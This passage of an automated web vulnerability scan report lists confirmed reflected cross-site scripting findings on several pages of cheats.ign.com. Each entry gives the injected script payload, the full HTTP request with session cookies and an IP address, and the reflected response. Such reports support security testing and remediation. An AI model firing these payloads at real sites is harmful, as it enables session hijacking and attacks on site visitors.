http://cheats.ign.com
Path:
/index/cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ace91"-alert(1)-"91fa5ed4333 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/nintendo-ds-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af17"><script>alert(1)</script>af6bcff7071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/nintendo-ds-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fc8"-alert(1)-"3c528f0452e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/pc-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b25b"-alert(1)-"859129d34f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... coreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/pc-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1c2"><script>alert(1)</script>acb3df6b5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/playstation-3-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ff"><script>alert(1)</script>9b70942b9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/playstation-3-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc63"-alert(1)-"d1160877f7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... = 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/playstation-portable-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b2f8"><script>alert(1)</script>a0f6b4d3eae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/playstation-portable-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eda0"-alert(1)-"f4bf6d7729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... fined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/wii-cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ac0"-alert(1)-"3c9c5074ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
